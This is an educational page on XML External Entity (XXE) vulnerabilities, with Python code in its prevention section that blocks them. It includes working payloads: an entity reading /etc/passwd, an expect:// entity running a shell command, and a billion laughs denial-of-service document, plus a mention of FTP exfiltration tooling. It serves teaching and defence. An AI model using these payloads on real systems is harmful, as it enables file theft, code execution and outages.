XML External Entities (XXE) (CWE-611)

Description

XML (Extensible Markup Language) is a markup language that encodes data in a machine-readable and human-readable format.

The XML 1.0 standard defines the document structure as in this example:

<?xml version="1.0"?>
<!DOCTYPE greeting SYSTEM "hello.dtd">
<greeting>Hello, world!</greeting> 

XML is commonly used for communication between client and server. XML is also used for sharing resources between two different web applications.

For example, suppose this XML is sent in the request body:

<?xml version="1.0"?>
<getPrice>
    <productId>2</productId>
</getPrice> 

The web application returns the price of the product with ID=2 as

1999

The attacker can then edit the request as

<?xml version="1.0"?>
<getPrice>
    <productId>-1</productId>
</getPrice> 

The web application will not find any product with a negative product ID, and it will return an error in the response such as

No product found with id -1

The attacker can then add a DTD (Document Type Definition) that declares an external entity, as

<?xml version="1.0"?>
<!DOCTYPE data [<!ENTITY secret SYSTEM "file:///etc/passwd" >]>
<getPrice>
    <productId>&secret;</productId>
</getPrice> 

The web application will read file:///etc/passwd and store its contents in the entity secret, so the response will be

No product found with id 
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys: 
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp: 
guest:!:100:100::/home/guest:

Thus the attacker can read any file on the server that the application can access. To retrieve many files faster, the attacker can stand up a temporary FTP server and pull the files out over FTP.

  • If the PHP 'expect' module is enabled, the attacker gets RCE (remote code execution) as

    <?xml version="1.0"?>
    <!DOCTYPE data [<!ENTITY secret SYSTEM "expect://ls" >]>
    <getPrice>
        <productId>&secret;</productId>
    </getPrice> 
    
  • An attacker can also mount a billion laughs attack (a type of DoS attack) using XXE.

      ```
      <?xml version="1.0"?>
      <!DOCTYPE lolz [
       <!ENTITY lol "lol">
       <!ELEMENT lolz (#PCDATA)>
       <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
       <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
       <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
       <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
       <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
       <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
       <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
       <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
       <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
      ]>
      <lolz>&lol9;</lolz>
      ```
    

    This 1 KB payload expands into XML containing 10^9, i.e. a billion, "lol"s, which takes about 3 GB of memory, resulting in DoS (Denial of Service).

Impact

  • Server file retrieval is possible (including sensitive files like /etc/passwd).
  • May lead to SSRF (Server Side Request Forgery).
  • Small temporary DoS (Denial of Service).

Prevention

  • Always sanitize user input.
  • Disable external entity processing and DTD processing in the XML parser.
  • Keep XML processing libraries up to date.
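The second prevention item, implemented for the getPrice endpoint above with Python's standard-library expat binding (an added example, not code from this page): the parser aborts on the first DOCTYPE declaration, before any entity can be defined, and never resolves external entities. The request samples, the UnsafeXML/InvalidRequest exception names and the getPrice/productId element handling are assumptions of this example.

```python
import re
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """The body carries a DOCTYPE/DTD, which a getPrice request never needs."""


class InvalidRequest(ValueError):
    """Well-formed XML, but not a valid getPrice request."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Fires on <!DOCTYPE ...>, i.e. before any <!ENTITY ...> is declared.
    # Stopping here blocks both the SYSTEM "file:///..." entity and the
    # nested "lol" entities of the billion laughs payload.
    raise UnsafeXML("DOCTYPE declarations are not accepted in request bodies")


def parse_get_price(body: bytes) -> int:
    """Return the productId of a <getPrice> request, refusing any DTD."""
    parser = expat.ParserCreate()
    # Never resolve external parameter entities either; and with no
    # ExternalEntityRefHandler set, expat never opens a SYSTEM identifier.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = _reject_doctype

    path, text = [], []  # element nesting; character data inside <productId>
    parser.StartElementHandler = lambda name, attrs: path.append(name)
    parser.EndElementHandler = lambda name: path.pop()

    def on_chars(data):
        if path == ["getPrice", "productId"]:
            text.append(data)
    parser.CharacterDataHandler = on_chars

    try:
        parser.Parse(body, True)
    except expat.ExpatError as exc:
        raise InvalidRequest(f"malformed XML: {exc}") from None

    raw = "".join(text).strip()
    if not re.fullmatch(r"-?[0-9]+", raw):  # also rejects an empty productId
        raise InvalidRequest(f"productId is not an integer: {raw!r}")
    return int(raw)


# Constructed samples: the benign request from the text and its XXE variant.
SAFE_REQUEST = b'<?xml version="1.0"?><getPrice><productId>2</productId></getPrice>'
XXE_REQUEST = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE data [<!ENTITY secret SYSTEM "file:///etc/passwd" >]>'
               b'<getPrice><productId>&secret;</productId></getPrice>')
```

A negative ID such as -1 still parses, as in the text; the lookup failure that follows is the application's business-logic error, not a parser concern.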

Tools

  • 230-OOB: An Out-of-Band XXE server for retrieving file contents over FTP.